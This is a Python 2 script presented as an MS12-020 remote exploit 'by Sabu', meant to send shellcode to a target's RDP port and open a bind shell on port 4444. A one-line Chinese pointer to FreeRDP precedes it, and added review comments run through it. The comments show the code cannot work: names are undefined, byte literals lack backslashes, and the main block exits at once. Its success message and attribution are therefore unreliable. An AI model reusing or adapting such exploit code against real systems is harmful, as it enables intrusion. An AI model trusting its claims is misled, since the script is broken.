freerdp 模块是 Linux 下的远程工具
下载地址是 https://github.com/FreeRDP/FreeRDP/downloads
#!/usr/bin/env python
#############################################################################
# MS12-020 Exploit by Sabu
# sabu@fbi.gov
# Uses FreeRDP
#############################################################################
# NOTE(review): as written this script cannot execute; every point below is
# visible in this file (the original was pasted with all line breaks
# collapsed; the layout here only restores them, no token was changed).
#  - It is Python 2 syntax throughout (print statements).
#  - Every "shellcode"/"payload"/"stub" literal is spelled 'x90x90...' with no
#    backslashes, so each 'xNN' is three ASCII characters, not one byte.
#  - `Thread` is used as the base class of SRVSVC_Exploit but is never
#    imported; `rdp` (used in __DCEPacket) and `self.__dce` (used in run) are
#    never defined or assigned.
#  - `struct`, `rdpRdp`, `crypto` and `rdpNego` are imported but never used;
#    `self.__port` is stored but never read.
#  - `print '[-]connected' % self.target` has no format specifier, so the `%`
#    raises TypeError even if the preceding connect() had succeeded.
#  - The __main__ block prints the usage text and calls sys.exit(-1)
#    unconditionally, so SRVSVC_Exploit is never instantiated or started.
#  - Nothing here speaks the RDP protocol the header names: the class name,
#    the `__DCEPacket`/`__dce` names and the `.call(0x1f, stub)` interface
#    describe a DCE-RPC style request to a service ("SRVSVC"), not RDP PDUs.
import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import rdpNego

# Author's claim: bind shellcode on TCP port 4444. As noted above these are
# plain-text 'xNN' characters, not bytes, so the claim is not realised.
shellcode = 'x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90'
shellcode += 'x29xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0exe9'
shellcode += 'x4axb6xa9x83xeexfcxe2xf4x15x20x5dxe4x01xb3x49x56'
shellcode += 'x16x2ax3dxc5xcdx6ex3dxecxd5xc1xcaxacx91x4bx59x22'
shellcode += 'xa6x52x3dxf6xc9x4bx5dxe0x62x7ex3dxa8x07x7bx76x30'
shellcode += 'x45xcex76xddxeex8bx7cxa4xe8x88x5dx5dxd2x1ex92x81'
shellcode += 'x9cxafx3dxf6xcdx4bx5dxcfx62x46xfdx22xb6x56xb7x42'
shellcode += 'xeax66x3dx20x85x6exaaxc8x2ax7bx6dxcdx62x09x86x22'
shellcode += 'xa9x46x3dxd9xf5xe7x3dxe9xe1x14xdex27xa7x44x5axf9'
shellcode += 'x16x9cxd0xfax8fx22x85x9bx81x3dxc5x9bxb6x1ex49x79'
shellcode += 'x81x81x5bx55xd2x1ax49x7fxb6xc3x53xcfx68xa7xbexab'
shellcode += 'xbcx20xb4x56x39x22x6fxa0x1cxe7xe1x56x3fx19xe5xfa'
shellcode += 'xbax19xf5xfaxaax19x49x79x8fx22xa7xf5x8fx19x3fx48'
shellcode += 'x7cx22x12xb3x99x8dxe1x56x3fx20xa6xf8xbcxb5x66xc1'
shellcode += 'x4dxe7x98x40xbexb5x60xfaxbcxb5x66xc1x0cx03x30xe0'
shellcode += 'xbexb5x60xf9xbdx1exe3x56x39xd9xdex4ex90x8cxcfxfe'
shellcode += 'x16x9cxe3x56x39x2cxdcxcdx8fx22xd5xc4x60xafxdcxf9'
shellcode += 'xb0x63x7ax20x0ex20xf2x20x0bx7bx76x5ax43xb4xf4x84'
shellcode += 'x17x08x9ax3ax64x30x8ex02x42xe1xdexdbx17xf9xa0x56'
shellcode += 'x9cx0ex49x7fxb2x1dxe4xf8xb8x1bxdcxa8xb8x1bxe3xf8'
shellcode += 'x16x9axdex04x30x4fx78xfax16x9cxdcx56x16x7dx49x79'
shellcode += 'x62x1dx4ax2ax2dx2ex49x7fxbbxb5x66xc1x19xc0xb2xf6'
shellcode += 'xbaxb5x60x56x39x4axb6xa9'

# Payload (same 'xNN' text form as above; appended to the stub in __DCEPacket).
payload = 'x41x00x5cx00'
payload += 'xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49'
payload += 'x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax68'
payload += 'x58x30x41x31x50x42x41x6bx42x41x78x42x32x42x41x32'
payload += 'x41x41x30x41x41x58x38x42x42x50x75x4bx59x49x6cx43'
payload += 'x5ax7ax4bx32x6dx5ax48x5ax59x69x6fx4bx4fx39x6fx71'
payload += 'x70x6ex6bx62x4cx44x64x71x34x4cx4bx62x65x75x6cx4c'
payload += 'x4bx63x4cx76x65x70x78x35x51x48x6fx6cx4bx50x4fx74'
payload += 'x58x6ex6bx33x6fx55x70x37x71x48x6bx57x39x6cx4bx66'
payload += 'x54x6ex6bx46x61x7ax4ex47x41x6bx70x7ax39x4cx6cx4c'
payload += 'x44x6fx30x62x54x44x47x38x41x4bx7ax54x4dx44x41x4b'
payload += 'x72x78x6bx39x64x35x6bx53x64x75x74x46x48x72x55x79'
payload += 'x75x6cx4bx53x6fx76x44x44x41x48x6bx35x36x4ex6bx54'
payload += 'x4cx30x4bx6cx4bx51x4fx65x4cx65x51x38x6bx77x73x36'
payload += 'x4cx4ex6bx6ex69x30x6cx66x44x45x4cx30x61x69x53x30'
payload += 'x31x79x4bx43x54x6cx4bx63x73x44x70x4ex6bx77x30x66'
payload += 'x6cx6cx4bx72x50x45x4cx4cx6dx4ex6bx73x70x64x48x73'
payload += 'x6ex55x38x6ex6ex32x6ex34x4ex58x6cx62x70x39x6fx6b'
payload += 'x66x70x66x61x43x52x46x71x78x30x33x55x62x63x58x63'
payload += 'x47x34x33x65x62x41x4fx30x54x39x6fx4ax70x52x48x5a'
payload += 'x6bx38x6dx6bx4cx75x6bx30x50x6bx4fx6ex36x53x6fx6f'
payload += 'x79x4ax45x32x46x6fx71x6ax4dx34x48x77x72x73x65x73'
payload += 'x5ax37x72x69x6fx58x50x52x48x4ex39x76x69x4ax55x4c'
payload += 'x6dx32x77x69x6fx59x46x50x53x43x63x41x43x70x53x70'
payload += 'x53x43x73x50x53x62x63x70x53x79x6fx6ax70x35x36x61'
payload += 'x78x71x32x78x38x71x76x30x53x4bx39x69x71x4dx45x33'
payload += 'x58x6cx64x47x6ax74x30x5ax67x43x67x79x6fx39x46x32'
payload += 'x4ax56x70x66x31x76x35x59x6fx58x50x32x48x4dx74x4e'
payload += 'x4dx66x4ex7ax49x50x57x6bx4fx6ex36x46x33x56x35x39'
payload += 'x6fx78x50x33x58x6bx55x51x59x4ex66x50x49x51x47x39'
payload += 'x6fx48x56x32x70x32x74x62x74x46x35x4bx4fx38x50x6e'
payload += 'x73x55x38x4dx37x71x69x69x56x71x69x61x47x6bx4fx6e'
payload += 'x36x36x35x79x6fx6ax70x55x36x31x7ax71x74x32x46x51'
payload += 'x78x52x43x70x6dx4fx79x4dx35x72x4ax66x30x42x79x64'
payload += 'x69x7ax6cx4bx39x48x67x62x4ax57x34x4fx79x6dx32x37'
payload += 'x41x6bx70x7ax53x6ex4ax69x6ex32x62x46x4dx6bx4ex70'
payload += 'x42x44x6cx4cx53x6ex6dx31x6ax64x78x4cx6bx4ex4bx4e'
payload += 'x4bx43x58x70x72x69x6ex6dx63x37x66x79x6fx63x45x73'
payload += 'x74x4bx4fx7ax76x63x6bx31x47x72x72x41x41x50x51x61'
payload += 'x41x70x6ax63x31x41x41x46x31x71x45x51x41x4bx4fx78'
payload += 'x50x52x48x4cx6dx79x49x54x45x38x4ex53x63x6bx4fx6e'
payload += 'x36x30x6ax49x6fx6bx4fx70x37x4bx4fx4ex30x4ex6bx30'
payload += 'x57x69x6cx6bx33x4bx74x62x44x79x6fx6bx66x66x32x6b'
payload += 'x4fx4ex30x53x58x58x70x4ex6ax55x54x41x4fx52x73x4b'
payload += 'x4fx69x46x4bx4fx6ex30x68';


# NOTE(review): `Thread` is not imported anywhere in this file, so this class
# statement raises NameError at import time, before any method can run.
class SRVSVC_Exploit(Thread):
    def __init__(self, target, port=3389):
        """Store the target; `port` is kept in self.__port but never read."""
        super(SRVSVC_Exploit, self).__init__()
        self.__port = port
        self.target = target

    def __DCEPacket(self):
        """Open a transport and assemble self.__stub from the module literals.

        `rdp` is never defined in this file, so the first statement after the
        print raises NameError. The second print applies `%` to a string with
        no conversion specifier, which raises TypeError.
        """
        print '[-]Connecting'
        self.__trans = rdp.transport.cert('rdp_np:%s\x00\x89]' % self.target)
        self.__trans.connect()
        print '[-]connected' % self.target
        # Making the packet: header text, shellcode, eight filler literals,
        # payload, trailer text -- all concatenated as ordinary str, not bytes.
        self.__stub='x01x00x00x00'
        self.__stub+='xd6x00x00x00x00x00x00x00xd6x00x00x00'
        self.__stub+=shellcode
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x41x41x41x41x41x41x41x41'
        self.__stub+='x00x00x00x00'
        self.__stub+='x2fx00x00x00x00x00x00x00x2fx00x00x00'
        self.__stub+=payload
        self.__stub+='x00x00x00x00'
        self.__stub+='x02x00x00x00x02x00x00x00'
        self.__stub+='x00x00x00x00x02x00x00x00'
        self.__stub+='x5cx00x00x00x01x00x00x00'
        self.__stub+='x01x00x00x00x90x90xb0x53x6bxC0x28x03xd8xffxd3'
        return

    def run(self):
        """Thread body: build the stub, then hand it to self.__dce.

        `self.__dce` is never assigned anywhere in this class, so the call
        would raise AttributeError even if __DCEPacket completed.
        """
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        print '[-]Exploit successfull!...nTelnet to port 4444 on target machine.'


if __name__ == '__main__':
    # NOTE(review): the usage message and sys.exit(-1) run unconditionally, so
    # the two lines after them are unreachable (and sys.argv[1] is read before
    # the argument count is checked, giving IndexError when no argument is
    # given).
    target = sys.argv[1]
    print 'nUsage: %s <target ip> n' % sys.argv[0]
    sys.exit(-1)
    current = SRVSVC_Exploit(target)
    current.start()